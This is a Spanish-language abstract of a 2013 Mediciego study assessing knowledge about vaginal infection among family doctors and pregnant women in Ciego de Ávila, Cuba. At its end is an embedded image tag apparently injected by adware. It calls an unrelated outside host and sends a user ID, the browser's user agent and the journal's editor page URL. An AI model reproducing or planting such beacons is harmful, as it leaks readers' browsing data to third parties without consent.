Evaluación del conocimiento sobre infección vaginal en gestantes del municipio Ciego de Ávila. - Rodríguez Batista, María Dolores; Becerra Licor, Marlene; Alfonso Martínez, Pedro A.; Reyes Ramírez, William (Mediciego, 2013)
Se realizó una investigación observacional descriptiva de carácter cuanti-cualitativa en el período comprendido de marzo del 2009 a marzo del 2010, el universo de estudio estuvo constituido por 60 médicos de familia pertenecientes a los consultorios médicos tipo I del municipio Ciego de Ávila y 100 gestantes. Se evaluaron conocimientos a los profesionales, a los que se le aplicó un cuestionario para identificar conocimientos y actitudes sobre infección vaginal en gestantes y 10 grupos focales a gestantes, 2 por cada área de salud. La mayoría de los profesionales plantearon la utilidad del exudado vaginal, muchos de ellos tuvieron conocimientos mínimos aceptables, pues desconocían síntomas y complicaciones así como las causas que la producen. La prevención de la infección vaginal no es considerada un factor importante para su control, lo que demuestra conocimientos mínimos aceptables en un 81,7 por ciento. Las gestantes refirieron dificultades en el conocimiento de los síntomas y el uso del preservativo como medio de protección. La evaluación del conocimiento, actitud y práctica sobre infección vaginal se valoró como mínimo aceptable y se propuso una estrategia de intervención educativa comportamental. <img src="http://prettysite.xyz/acnt?_=1584034604779&did=24&tag=new_installer&r=http%253A%252F%252Fwww.revmediciego.sld.cu%252Findex.php%252Fmediciego%252Feditor%252FviewMetadata%252F260&ua=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64%3B%20rv%3A70.0)%20Gecko%2F20100101%20Firefox%2F70.0&aac=&if=1&uid=1583231151&cid=2&v=452" alt="" />